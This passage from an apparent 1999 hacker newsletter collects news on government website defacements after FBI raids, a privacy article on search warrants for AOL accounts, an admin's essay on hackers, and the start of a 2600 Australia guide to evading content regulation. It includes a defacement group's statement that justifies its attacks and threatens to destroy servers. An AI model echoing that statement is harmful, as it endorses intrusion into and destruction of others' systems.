Also, deregulation of the telephone and power industries has created another weakness: To stay competitive and cut costs, companies have reduced spare capacity, leaving them more vulnerable to outages and disruptions in service. Still another flaw is the domination of the telecommunications system by phone companies and Internet service providers (ISPs) that don't trust each other. As a result, the systems do not mesh seamlessly and are vulnerable to failures and disruptions. "There's no way to organize systems built on mutual suspicion," Schneider says. "We're subtly changing the underpinnings of the system, but we're not changing the way they're built. We'll keep creating cracks until we understand that we need a different set of principles for the components to deal with each other." 'The democratization of hacking' Meanwhile, the tools of mayhem are readily available. There are about 30,000 hacker-oriented sites on the Internet, bringing hacking -- and terrorism -- within the reach of even the technically challenged. "You no longer have to have knowledge, you just have to have the time," Clyde says. "You just download the tools and the programs. It's the democratization of hacking. And with these programs ... they can click on a button and send bombs to your network, and the systems will go down." Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and farmers. In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours. "Although the press plays up the security aspect of hacker problems," says Schneider, "the other aspect is that the systems are just not built very reliably. 
It's easy for operators to make errors, and a gopher chewing on a wire can take out a large piece of the infrastructure. That's responsible for most outages today." 'The prudent approach' Schneider and Clyde favor a team of specialists similar to Clinton's proposed "Cyber Corps" program, which would train federal workers to handle and prevent computer crises. But they say many problems can be eliminated with simple measures. These include "patches" for programs, using automated tools to check for security gaps and installing monitoring systems and firewalls. Fixes are often free and available on the Internet, but many network administrators don't install them. A step toward deterrence was taken in 1998 when CIA Director George Tenet announced that the United States was devising a computer program that could attack the infrastructure of other countries. "That's nothing new," says Clyde, "but it's the first time it was publicly announced. If a country tries to destroy our infrastructure, we want to be able to do it back. It's the same approach we've taken with nuclear weapons, the prudent approach." The U.S. Government Accounting Office estimates that 120 countries or groups have or are developing information warfare systems. Clyde says China, France and Israel already have them, and that some Pentagon intrusions have surely come from abroad. "We don't read about the actual attacks," says Clyde, "and you wouldn't expect to." "The Analyzer" was caught after he bragged about his feat in computer chat rooms, but Clyde says the ones to worry about are those who don't brag and don't leave any evidence behind. "Those are the scary ones," he says. "They don't destroy things for the fun of it, and they're as invisible as possible." 
@HWA

04.0 The hacker from an administrator's point of view
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by System (Indonesia)

Note: be gentle, this was translated from Indonesian. (ESL)

Hacker: An overview from an admin's point of view.
by system (30 May 1999).

Hackers are an enemy
--------------------

Yes, that's true. Hackers are an enemy for certain administrators, because hackers to them are very annoying. They only give an admin a lot of work to do: from just maintaining the network, now he must also watch the network, find the hole in his network, and finally fix his network. Not even in the case when the hackers can get in to their network and break / steal / and modify the data from their network users' computers.

Being a network administrator is not easy: not only must he know and understand how the network goes, he also must have the capability to fix unknown errors or hacker intruders in the network. [ This is what I call a well-qualified admin ]. But it is not easy to find that kind of admin. In this world, there are too many admins that only know how to maintain the network but cannot find the hole in their network, or even cannot fix the hole. What they think is "This is not my job, my job is only maintaining the network, I don't know anything else". Well, this is the type of admin that calls the hacker an enemy, because they only think that hackers only give them a job to do. Hackers are only trying to bring down their network. He never thinks in a positive way. But, is this true ??? ...

Hackers are a friend
--------------------

Yes, that's true. Hackers are a friend for certain administrators. They bring their passion for working back to life. The hackers are helping them to strengthen their network. An administrator that calls hackers their friend is what I call a highly dedicated admin. Why?
Because that type of admin doesn't think about the job that they must take on; they only think that this is the right time that they have been waiting for, a time that makes their job not boring again. Now they can find the hole that exists in their network, and finally fix the right hole in their network. Do you ever feel how good it is when you do what you like? If you do, that is the same feeling that administrator feels too. They think hackers are not their enemy, but their friend and job mate whom they must honour.

Summary
-------

- So, what are hackers to you ???

###########################################################################################
Any comments or suggestions are welcome, please send them to system@hackerlink.or.id
You can also see it on my website at http://www.hackerlink.or.id/?hack=artikel.htm
###########################################################################################

@HWA

05.0 Retaliation against the FBI continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Retaliation Against FBI Continues

contributed by mortel

The cracks of the US Senate web site and DoS attacks against the FBI web site were not the end of the protests over recent FBI actions. Last week the FBI executed up to nine search warrants mostly against members of a group known as gH or Global Hell. At this time HNN is not aware of any arrests that have been made. These actions by the FBI have upset a few people and in retaliation they have attacked the US Department of Interior web site.
MSNBC http://www.msnbc.com/news/273819.asp
Nando Times http://www.techserver.com/story/body/0,1634,54975-87979-624391-0,00.html
ABC News http://www.abcnews.go.com/sections/us/DailyNews/computer_hackers990531.html
HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html

F0rpaxe a group based in Portugal and with close connections to gH has claimed responsibility for defacing numerous web sites over the weekend (see list at bottom) and have also released a statement expressing their view about what has been going on.

F0rpaxe Statement

FORPAXE TECHNOLOGIES INC. STATEMENT

F0rpaxe needs to inform all people what is going on. At this moment and for what we know, F0rpaxe is the only Portuguese group that is executing massive attacks on edu, gov, mil, com servers. Maybe this is the reason why F0rpaxe is now being wanted by PJ (Portuguese police) and some international organizations like FBI and Interpol.

While we had been away for a few days we had watched several events on the Portuguese media which in a certain way implicate F0rpaxe. Some newspapers reported that PJ is now doing their homework together with FBI to lock down "Hackers" who allegedly are involved on US hacks. Also PJ is now our BIG BROTHER since they are gathering efforts to make a net surveillance over Portugal. For what it seems they have the help of Portuguese ISPs like Telapac. Their goal is to track down hackers... In an article of "EuroNoticias" they call hackers to the ones who use trojans to steal accounts (l0l). If PJ thinks that this is their biggest problem then that info about working together with the FBI is a bullshit... Portugal is now passing through serious or hilarious actions.. IF the goal of PJ is to track down people who use trojans to steal accounts then they have to arrest all population. We think that this isn't their main goal since F0rpaxe had been informed that PJ is trying to get solid proofs that we are the ones responsible for all those hacks.
PJ doesn't scare anyone. IF FBI is really working together with PJ then they are doing this only because of us...most certainly to erase us from the system...

FBI had been mounting schemes to track us down.... FBI had already tried to pretend being Iron-Lungs to get info about our current hacks, if we still had access to gov servers, if we had copied military databases and all that sort of things... The real I-L reported that the fake I-L wasn't him. The guy was always asking things and we just ignored...it could be just a lamer trying to get some info about us... But then the attempts to track us down started: the guy started to contact people who are close to F0rpaxe, like some of attrition staff, in order to get our contact like phone etc... They even asked some of them to phone us.... When they realized that we had discovered they started trying to get info from all those who surround us...a few days later an article on a newspaper reported that FBI and PJ were (or are?) working together...

We don't know if all this is the truth or only a misunderstanding but one thing we know FBI really want us bad and they will do anything to catch us. We think that FBI doesn't want us just because of all the hacks but to show that they have the authority to arrest hackers of other countries. Although they need the permissions of the government and that isn't easy. They should be tired of making American Hackers life miserable and now they want to do the same with us....... As we told before we had been away for a while because things were starting to be pretty bad...

Groups who work on the shadow

Some groups just disappear but they don't disappear truly..They start working on the shadow because FEDS are always ready to take them down...We thought that it wouldn't happen that with us but sooner or later we will need to go back to where we belong...to the shadow.
We also take this chance to show our support with people who are now facing legal troubles, like I-L, dk, Zyklon.....Kevin and all the others who will face them in the future... gH has also our support.

Information in Portugal

Portuguese media isn't aware of all this.... neither some admins who were hacked and nothing was reported....In Portugal people don't care about what happens...They aren't aware that there are people building an underground system. It's just that. On CNN, ZDNET, Wired etc.. they inform what's happening.... In Portugal the media just doesn't give a shit.... Maybe this is the best for us since this will prevent a media hype and PJ and other FEDS won't be after us so soon..but information isn't circulating as it should. People built a bad image of the "hacker". Portuguese media report "hackers" as being the ones who use trojans... Man....they aren't aware of the true meaning of the concept "hacker" They should think about it...

Why are we doing this?

We agree with some of the things that had been said by some groups. We are always hacking and for what? We hack and hack things which can be fixed in 2 minutes. In fact we could have done worse like destroying completely all servers. We can do it if we want but hackers are waiting for justice. If FBI doesn't stop we won't and we can start destroying. We think that FBI should explain what the fuck they are doing. For the moment we won't destroy the servers we hack but if it is necessary we can burn a lot of servers. For example this gov server could be erased completely. Everyone should think about this, about what's happening. Don't make all this a media hype just inform in a simple manner....people need to know. People need to know why all these hacks. People need to know who FBI really is.
MSNBC; Tough talk amid new Web assaults White House and federal agencies lay down the law while computer attackers hit another federal Internet site By Alan Boyle, Bob Sullivan and Brock Meeks June 1 — The White House, Pentagon, Justice Department and FBI all addressed a rash of electronic attacks on federal Web sites Tuesday, even as the attackers hit new targets. The protest campaign against last week’s FBI raids on computer users spilled across global cyberspace, from the Pacific to Europe. THE WEB ONSLAUGHT began nearly a week ago, after FBI agents served search warrants on members of the hacker community in Washington state, Texas, California and other areas of the country. The raids — which were aimed at gathering evidence related to past computer intrusions as well as unauthorized use of telephone systems — sparked attacks that forced the shutdown of the FBI and U.S. Senate Web sites last week. After beefing up security, the Senate site is back in service, but the FBI site is still inaccessible. Scores of protest pages have rudely taunted the FBI, and government officials laid down the law at several news briefings Tuesday. “Cyber-security is something the government takes very seriously,” White House spokesman Joe Lockhart said in response to a reporter’s question. “I know that there have been a series of attempts (to break into government computers) with some success, some without success. ... We take it very seriously. We are constantly reviewing and will continue to review the security measures we have.” Last month, a group known as Global Hell, or gH, was implicated in attacks on the White House Web site as well as sites for several Cabinet departments and the U.S. Information Agency. Also last month, Global Hell member Eric Burns, who also goes by the name Zyklon, was indicted in connection with attacks on three computers, including the USIA system. 
White House Web site shut down Lockhart emphasized that those implicated in the latest wave of attacks were liable to face a similar fate. “For those who think that this is some sort of sport, I think (it will be) less fun when the authorities do catch up with them ... and these people are prosecuted,” he said. At another briefing, Pentagon spokesman Kenneth Bacon said system administrators were briefly limiting Web access Tuesday so they could beef up security. He said such measures would make it “much more difficult” to deface Pentagon Web pages. “It has not been a major problem,” Bacon said. “This is much more protective than reactive. It’s looking to the future to prevent the types of problems (seen) at other agencies.” Federal law-enforcement officials emphasized the harsh criminal penalties that Web intruders could face: Attackers who cause $5,000 worth of damage in one year could be charged with a federal felony that carries up to five years in prison, the head of the Justice Department’s computer crime section, Scott Charney, told The Associated Press. Merely gaining unauthorized access to a government computer could bring a year in jail, but Charney pointed out that the cost of fixing a compromised Web site could mount to $5,000 in employee time alone. A Dallas telecommunications company suffered a considerable loss — perhaps ranging into millions of dollars — because of intrusions that are the subject of the FBI’s current investigation, bureau spokesman Frank Scafidi said. “What we investigate are violations of law,” he told MSNBC. “If a hacker feels that our investigating somebody’s illegal activity is somehow an infringement on that individual’s freedom to do what he wants to do, then there is a basic misunderstanding of the way this country works.” Scafidi said there was “no intention on our part to select a group of people and pick on them. ... 
They get the first move in this game.” But he also indicated that the justice system intended to have the last word. “When there is a violation ... we will pursue it, and usually we will knock on somebody’s door and maybe take some computer equipment,” he said. Such equipment may have to be held for months or years, to be used as evidence in a trial or during the appeal process, he said. As for the FBI site’s down time, Scafidi said: “That isn’t affecting the FBI’s investigative response in any way. It is a problem for us in that we rely on our Web site as a place for anybody to go and get information on the FBI for any purpose ... so it is a public information resource for us, and since it has been down it has really been affecting a lot of innocent parties out there.” THE LATEST VICTIMS Tuesday’s governmental victim was the General Services Administration, which manages U.S. government property. At least three pages on the Web site for the GSA’s Office of Governmentwide Policy — www.policyworks.gov — were briefly replaced with protest pages. “Our sentence is hacking everything we can as a protest to FBI current actions,” one page read. The hacked pages were accessible for 10 to 15 minutes, said Joe McKay, director of office information systems at the Office of Governmentwide Policy. He said the attacker apparently gained access through a security gap related to file transfer protocol, or FTP. “We’ve terminated all FTP services, and I am issuing on a need-to-use basis new FTP access,” he told MSNBC. The site was working normally Tuesday night, and computer server logs were being analyzed for further clues, he said. “We’re always playing catch-up, it seems,” he said. 
“It’s important to show (the attackers), ‘Hey, you got us, but we’re OK now.’ ” The hacked pages claimed credit on behalf of a group called Forpaxe, including a member using the handle “M1crochip.” Similar credits appeared on hacked pages placed Tuesday on Web servers at Monash University in Australia and Coca-Cola’s Belgian subsidiary, as well as a page that briefly appeared Monday at the Idaho National Engineering and Environmental Lab’s Web site. The hacked pages indicated that M1crochip lived in Portugal — which others in the hacker community confirmed. Another computer user said to be involved in the current wave of Web attacks reportedly lived in Britain. BACKGROUND ON THE FBI RAIDS Members of Global Hell reported that law-enforcement officials served search warrants last Wednesday in Texas, California and Washington state. AntiOnline, a Web site focusing on the hacker community, indicated that the sweep extended to other states as well. One of the subjects of the search warrants was a contractor working at Microsoft, which is a partner in the joint venture that operates MSNBC. When contacted by MSNBC, the contractor — who uses the online handle “VallaH” — confirmed that nine law-enforcement agents served him with a warrant at his Seattle-area apartment, interrogated him and confiscated computer equipment. He said he was not involved in any illegal activity and surmised that he was implicated by a former associate in the hacker community. FBI agents also contacted Microsoft, said company spokesman Adam Sohn. “This is an active investigation, and there’s not a lot we can say,” Sohn said Monday. “It’s an FBI matter, it’s not a Microsoft matter.” He indicated that FBI agents were interested in computer equipment that VallaH used at Microsoft. “As far as I have been told, we are still in possession of the property. However, we’re cooperating with the FBI in the investigation,” Sohn said. VallaH said he was told not to report for work at Microsoft. 
“We did ask that his assignment at Microsoft be terminated. I don’t know what his status is with his contracting agency,” Sohn said. MEANWHILE, IN HOUSTON ... In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating “allegations of computer intrusions” involving, among others, a teen-ager who uses the hacker handle “Mosthated.” In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were “really mad. ... The computer had all their financial information and stuff on it.” Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was “really mad.” Mosthated said at least eight other people around the country had been served with search warrants as part of “a huge hacker crackdown.” Four other Houston-area hackers, three in California and one in the Seattle area reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said. Media representatives at FBI offices in San Diego and Seattle said they could not comment on the investigation. Do you have a tip related to this story? Please send your suggestions to tipoff@msnbc.com. ABC; Hackers Strike Again Deface Interior Department and Supercomputer Lab Web Sites By Ted Bridis The Associated Press W A S H I N G T O N, June 1 — A spate of high-tech vandalism against the government continued this week, as computer hackers defaced two more federal Web sites and left a taunting note promising to attack other sites because of a related FBI investigation. Hackers from different organizations defaced Web sites Monday for the Interior Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming “it’s our turn to hit them where it hurts.” “These are the perils of open government,” said Stephanie Hanna, an Interior spokeswoman. 
“We try to make as much of the materials of the Interior Department as open and available as possible. The consequence of that is, those who choose to do damaging things can do that.” Messages left at the attacked sites suggest they were vandalized to retaliate against what was said to be the FBI’s harassment of specific hacker groups, including the group that boasted of breaking into the White House site last month. The FBI confirmed it executed four search warrants last week in Texas related to an investigation into allegations of computer intrusion, including one search at the home of a prominent hacker in Houston. FBI Took Down Site Last Week Last week, hackers claiming to be from another group defaced the Web site for the Senate, causing it to be taken offline through the weekend. The FBI also was forced to take down its own Internet site last week after hackers launched an electronic attack against it. It remained inaccessible Monday, along with the Web site for its National Infrastructure Protection Center, which helps investigate computer crimes. On Interior’s Web page, the hackers left a message Monday saying they were “going after every computer on the Net with a .gov (suffix). ... We’ll keep hitting them until they get down on their knees and beg.” At the site maintained by the Idaho National Engineering and Environmental Laboratory, a note threatened the electronic destruction of the powerful computers that “serve” pages on the Internet “if the FBI doesn’t stop.” “We could have done worse, like destroying completely all servers,” the note said. “We can do it if we want, but hackers are waiting for Justice.” Warnings of More to Come In an online interview with The Associated Press, the hacker claiming responsibility for the laboratory attack warned that further FBI investigation would result in more severe damage. The hacker identified himself only as M1crochip, living in Portugal and part of a group calling themselves F0rpaxe. 
The interview was arranged through a mutually trusted third party.

“If FBI doesn’t do anything and doesn’t stop arresting people and making our life miserable, each member of F0rpaxe will discuss an eventual destruction of every single server,” he said. “If that happens, everything goes down.”

He added, “We don’t want to proceed that way,” and called the electronic attacks the “only resource” of the hacker community.

The FBI in Washington declined comment Monday.

Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns reportedly is known on the Internet as “Zyklon” and is believed to be a member of the group that claimed responsibility for the attacks on the White House and Senate sites.

“Zyklon” was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.

Burns was accused of breaking into a computer used by the U.S. Information Agency between August 1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington.

Nando Times; Two more federal Web sites hacked

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By TED BRIDIS

WASHINGTON (June 1, 1999 7:40 a.m. EDT http://www.nandotimes.com) - A spate of high-tech vandalism against the government continued this week as computer hackers defaced two more federal Web sites and left a taunting promise to attack other sites because of a related FBI investigation.

Hackers from different organizations defaced Web sites Monday for the Interior Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming "it's our turn to hit them where it hurts."

"These are the perils of open government," said Stephanie Hanna, an Interior spokeswoman. "We try to make as much of the materials of the Interior Department as open and available as possible. The consequence of that is, those who choose to do damaging things can do that."

Messages left at the attacked sites suggest they were vandalized to retaliate against what was said to be the FBI's harassment of specific hacker groups, including the group that boasted of breaking into the White House site last month.

The FBI confirmed it executed four search warrants last week in Texas related to an investigation into allegations of computer intrusion, including one search at the home of a prominent hacker in Houston.

Last week, hackers claiming to be from another group defaced the Web site for the Senate, causing it to be taken offline through the weekend.

The FBI also was forced to take down its own Internet site last week after hackers launched an electronic attack against it. It remained inaccessible Monday, along with the Web site for its National Infrastructure Protection Center, which helps investigate computer crimes.

On Interior's Web page, the hackers left a message Monday saying they were "going after every computer on the Net with a .gov (suffix). ... We'll keep hitting them until they get down on their knees and beg."

At the site maintained by the Idaho National Engineering and Environmental Laboratory, a note threatened the electronic destruction of the powerful computers that "serve" pages on the Internet "if the FBI doesn't stop."

"We could have done worse, like destroying completely all servers," the note said. "We can do it if we want, but hackers are waiting for Justice."

In an online interview with The Associated Press, the hacker claiming responsibility for the laboratory attack warned that further FBI investigation would result in more severe damage. The hacker identified himself only as M1crochip, living in Portugal and part of a group calling themselves F0rpaxe. The interview was arranged through a mutually trusted third party.

"If FBI doesn't do anything and doesn't stop arresting people and making our life miserable, each member of F0rpaxe will discuss an eventual destruction of every single server," he said. "If that happens, everything goes down."

He added, "We don't want to proceed that way," and called the electronic attacks the "only resource" of the hacker community.

The FBI in Washington declined comment Monday.

Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns reportedly is known on the Internet as "Zyklon" and is believed to be a member of the group that claimed responsibility for the attacks on the White House and Senate sites.

"Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.

Burns was accused of breaking into a computer used by the U.S. Information Agency between August 1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington.

@HWA

06.0 Threat to online privacy: The Search Warrant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

New Threat to Online Privacy, The Search Warrant

contributed by mortel
This article gives the impression that some of today's legal practices are a good anti crime thing but judges are handing out search warrants that cover online communications like candy. That email from your doctor is just as much fair game as the one from your secret lover. Judges must be educated so that limits can be placed on these things. A choice quote from the article "AOL is extremely law-enforcement friendly," Ron Horack of the Loudoun County, Va., sheriff's department said, "They don't hold anything back."

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/privacy990528.html

What We Leave Behind Online Activities Become Open Trail for Authorities

By Calvin Woodward
The Associated Press

L E E S B U R G, Va., May 28 — Go for a walk, drive a car or dance in the moonlight and chances are, no one notices. Journey on the Internet and a trail is left. And police are hot on that trail in a growing number of criminal investigations.

Armed with search warrants, police are looking into the online activities of suspects, and sometimes victims, by seizing evidence from Internet service providers and finding material that people online never dreamed would end up in the hands of the law.

Private e-mail between lovers. The threatening missives of haters. The true identities of people hiding behind screen names in a medium they thought was the essence of secrecy.

Va. Sheriff Helps Get AOL Help

“Ultimately, if you break the law, it can be traced,” said investigator Ron Horack of the Loudoun County, Va., sheriff’s department.

Horack helps police around the country apply for search warrants to get material from the county-based America Online, the world’s largest Internet service provider with 18 million customers.

“I know who you are and where you live,” an anonymous hatemonger e-mailed a 12-year-old girl in Lancaster, Pa.

By peeking into the accounts of Internet providers, police can often say the same thing: They know who the threatening people are and where they live.

This week federal authorities said they had charged a northern Virginia pediatrician with possessing child pornography after investigating his AOL account and finding at least 22 explicit images sent to him via e-mail over the course of nearly six months. They said they then found more child pornography on his computer. The doctor could not immediately be reached for comment.

Wide Powers of Warrant

With a warrant, law enforcement authorities can look at the electronic mail and other online communications of people suspected of a range of serious crimes, getting information not just from a home computer but often the company that provides the Internet, e-mail or chat service.

They can do the same with victims, in the process seeing mail from people who corresponded with them but had nothing to do with a crime.

Everything from humdrum to-do lists to love letters from illicit digital dalliances becomes potential evidence, and eventually a matter of public record.

“It is a growing risk to privacy,” said Marc Rotenberg, executive director of the Electronic Privacy Information Center, who says police should stick to traditional methods such as stings, informants and forensic evidence, which don’t invade people’s communications.

Said Horack: “If they’re going to use the Internet for their crime, we’re going to use the Internet to catch them.”

Used in Littleton Investigation

Authorities turned to AOL to see some of the online activities of the two high school students who killed 13 other people and themselves in Littleton, Colo., last month. They’ve used it to try to track down some of the copycat threats that have closed many schools since.

They took the same route, thus far with inconclusive results, after a woman in Pennsylvania was told in a chat room, “I guarantee you I will hurt you if you don’t listen to me,” and when a man in New York was charged with attempted murder of his wife, who, police say, was having a passionate online encounter her husband happened to see.

“AOL is extremely law-enforcement friendly,” Horack said.
“They don’t hold anything back.”

America Online tells its nearly 18 million customers it won’t read or disclose private communication or personal identifying information except under a “valid legal process.”

Most ISPs Have Similar Rules

Other major Internet service providers, or ISPs, as well as separate online e-mail services and Internet hubs like Hotmail and Yahoo, say much the same, although the disclaimers may be hard to find in screens of small print.

“We have a long-standing policy of cooperation with law enforcement,” said AOL spokesman Rich D’Amato. Communications such as e-mail are disclosed only in criminal investigations and with a warrant, he says.

In response to orders in civil cases, AOL may give out information allowing someone’s real name to be matched to a screen name. So if a spouse is found to be having an online affair with someone known only as Heart4U, the identity of that cyberlover might eventually be uncovered in a divorce proceeding.

Chat Rooms Not That Anonymous

Raytheon Inc. obtained subpoenas to identify 21 people, most of them employees, said to have been spreading corporate secrets and gripes in an anonymous online chat room. It then dropped a lawsuit it had brought against the 21, each identified as “John Doe,” indicating to privacy experts that the company had gone to court in the first place only to learn the identities of the chatters. Four employees quit; others entered corporate “counseling.”

Privacy advocates worry that authorities could go on increasingly invasive fishing expeditions.

“There are simply many more events that are recorded (online) that would not be recorded in the physical world,” said Rotenberg. “I think it is going to become an enormous problem as people become more and more dependent on ISPs.”

Anonymous Options Fight Back

Meanwhile, tools continue to be developed to protect anonymity — a site called anonymizer.com, for one, will relay e-mail, stripping out the sender’s identifying information.

So far, at least, few warrants going to AOL look like goose chases, an impression formed after a review of the more than 100 that have been filed in Leesburg this year. Most involve alleged pedophiles, stalkers and harassers who have used the Internet to find prey and left evidence of their intentions with victims or undercover police.

Horack prepares warrant applications for police from other parts of the country, some so new to digital detective work they need their children’s help to get online. Once they are approved by a magistrate, he takes them to AOL and retrieves the information. It’s almost a full-time job, offered by the sheriff because the company gives such a big boost to the county.

Works Well With Pedophile Search

The warrants are especially effective against child pornographers, Horack says. “Pedophiles are pack rats. They don’t throw away anything.” Even when they do delete material from their computer, it might be found at the service provider.

In the case of the 12-year-old Pennsylvania girl, nothing turned up in the AOL search. Most of the time, something does.

For example, police in Hendersonville, Tenn., turned to AOL to see the Internet activity of Dennis Wayne Cope, 47, shot and found dead in a crawl space of his home in February.

In an affidavit seeking access to Cope’s e-mail, “buddy list content” and other online activities, police said he had been corresponding online with the estranged wife of suspect Robert Lee Pattee. They also say Pattee’s hand print was found at the scene. Pattee has been charged with first-degree murder.

@HWA

07.0 2600 in Aussieland bares its teeth at the current clampdown on The Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2600.org.au Issues Instructions for Legally Circumventing the Law

contributed by webmaster
The Australian government is introducing internet content regulation this week despite extensive opposition from free speech advocates and technical advisors.
Given that fighting the law itself is now apparently futile, 2600 Australia has critiqued the law and described apparently legal ways in which you can evade it. We're not sure what the fallout from spelling out how to (legally) evade the law will be, but take a look while you can...

2600.org.au
http://www.2600.org.au/censorship-evasion.html

Interesting reading, check it out.

Evading the Broadcasting Services Amendment (Online Services) Act 1999

by Dogcow

Reference Links:

US Mirror - US Mirror of this document (for obvious reasons)
http://members.xoom.com/2600aus/censorship-evasion.html

Broadcasting Services Amendment (Online Services) Act 1999 - PDF format
http://www.aph.gov.au/parlinfo/billsnet/99077.pdf

Broadcasting Services Amendment (Online Services) Act 1999 - HTML format
http://www.ozemail.com/~mbaker/amended.html

Senate Select Committee on Information Technologies - Index
http://www.aph.gov.au/hansard/senate/commttee/s-it.htm

Squid - an open source proxy server
http://www.nlanr.net/Squid/

NLANR Cache - an open proxy hierarchy
http://www.nlanr.net/Cache/

Anti CensorWare Proxy - Masks the URL you're accessing
http://ians.978.org/rdrp-c/

Free S/WAN - an IPSEC implementation for Linux
http://www.xs4all.nl/~freeswan

PGP - International download site
http://www.replay.com/menu/pgp.html

SSL - Open Source SSL implementation
http://www.openssl.org/

FTP by email - instructions
ftp://rtfm.mit.edu/pub/usenet/news.answers/internet-services/access-via-email

BugTraq Mailing List - Web Archive
http://www.netspace.org/lsv-archive/bugtraq.html

Words filtered by iFilter - Thanks to Danny Yee
http://www.anatomy.usyd.edu.au/danny/freedom/censorware/ifilter.html

Introduction

Australia's citizens are about to be subject to content regulation on the Internet following the introduction of an amendment to existing legislation relating to broadcasting services. This legislation defines certain responsibilities for the ABA (Australian Broadcasting Authority), the OFLC (Office of Film and Literature Classification) and any company or individual providing public access to "Internet content".

All rhetoric aside about "big brother" and how this legislation spells the end of free speech in this country, it is acknowledged by most if not all participants in the debate about this legislation that, for a number of reasons it will be very difficult if not impossible to effectively stem the tide of what the government calls "illegal and offensive material".

This paper has one aim - to highlight the futility of attempting such content regulation by explicitly describing the legal means by which citizens can evade the provisions within the legislation.

Warning

I believe that all Australian laws should be in language understandable by ordinary Australians. This paper is my interpretation of the Broadcasting Services Amendment (Online Services) Act 1999 and should not be construed as anything more than this.

Just as I believe what you view on the Internet should be your own responsibility, if you choose to follow any of my suggestions here, it's your sole responsibility to deal with any adverse or unforeseen consequences of those actions. That said, if you disagree with anything I've said here, feel free to contact me.

The means of evasion...

I should point out that most of these means of evasion assume that the content you want to access is outside the country and therefore beyond the effective reach of the "take down notices" mentioned in the legislation.

  Use an alternate proxy network - connect to a different proxy server on a non-standard port
  Mask web content before entering the proxy network - change some words, change some server names
  Encrypt the content - they can't regulate what they can't read
  Encrypt web content before it enters the proxy network
  Use an encrypted VPN/tunnel for streaming content
  Distribute content by means of a "company" to your "employees"
  Offer on-demand, point-to-point email access to content
  Flood the ABA with legitimate, appropriate complaints
  Use a "recognised alternative access prevention arrangement"
  Mirror content so widely as to prevent effective enforcement of the legislation

Use an alternate proxy network

You should be able to access any content you wish by connecting to a proxy server network outside Australia either directly from your browser on a port other than 80, 3128 or 8080 (the most popular proxy server ports, and the ones most likely being transparently proxied) or using a Squid-like cache internal to your network that accesses a proxy hierarchy outside Australia on a port other than 3130 (the standard ICP port).

This assumes that the government does not mandate the use of a packet level filter, regardless of how ineffective one might be at locating banned content in a stream of data passing through it and preventing access to it. If it were to do this, it would most likely be done using an industry standard able to be defined under Part 5 of the legislation.

Transparent proxying, for those unsure of its meaning, is the process of redirecting a user's outgoing web content request through a network switch capable of what's called layer 3 routing.
Layer 3 routing enables the network switch to invisibly redirect the web content request away from the intended destination into a proxy server which then fetches the web content for you, assuming it's not been configured to block certain URLs or certain media types (mpg movies, for example).

Mask web content before entering the proxy network

Assume your ISP uses transparent proxying methods to pass all web content through a filter of some kind. What about masking the web content in some way at the server (aka "internet host") end such that when it passes unhindered through the proxy network, your computer can unmask the information, making it visible to you? A basic example of this, but one that only masks the URL you're trying to access is accessible here. The Youth Alliance against Internet Censorship offers information on software for your computer that can disable a proxy server here.

Encrypt the content before it enters the proxy network

Above, I mentioned the ability to mask content on the server side before it passes through the proxy network. The same concept can be applied to any Internet content using encryption. This could be achieved using a traditional SSL-based transaction between a server and your own computer, by means of a PGP-based transaction with an appropriately configured server, or by using any other form of encryption that prevents decryption by anyone other than yourself.

Use an encrypted VPN/tunnel for streaming content

A VPN is a Virtual Private Network. It allows physically separate networks to operate in a homogenous fashion by encrypting packets at one particular "endpoint", tunnelling them (sending in a point-to-point fashion) across the internet, then decrypting them at some other "endpoint", protecting the information being passed between the two networks. A typical use of a VPN is by a company with offices in different cities or in different countries.
VPN technologies are offered by a number of major networking vendors including Cisco, Bay Networks and Ascend, though usually with a fairly high price tag attached. At a more grass roots level, end users can download and use a product called SSH (Secure Shell) to give them secure network access to UNIX shells and set up encrypted tunnels between two hosts. For Linux users, the kernel comes with tunnelling code built-in and can be made secure with IPSEC patches available from the Netherlands.

Distribute content by means of a "company" to your "employees"

The legislation allows for information to be distributed to an end-user provided they are within your "immediate circle" and is described in Subclause 9(1-4):

9 Supply to the public

(1) This clause sets out the circumstances in which an Internet carriage service is taken, for the purposes of subclause 8(1), to be supplied to the public.

(2) If: (a) an Internet carriage service is used for the carriage of information between 2 end-users; and (b) each end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public.

Note: If a company makes Internet content available for access on the Internet, and an individual obtains access to the content using an Internet carriage service, the company and the individual are end-users in relation to the carriage of the content by the Internet carriage service.

(3) If: (a) an Internet carriage service is used to supply point-to-multipoint services to end-users; and (b) at least one end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public.

(4) If: (a) an Internet carriage service is used to supply designated content services (other than point-to-multipoint services) to end-users; and (b) at least one end-user is outside the immediate circle of the supplier of the service; the service is supplied to the public.

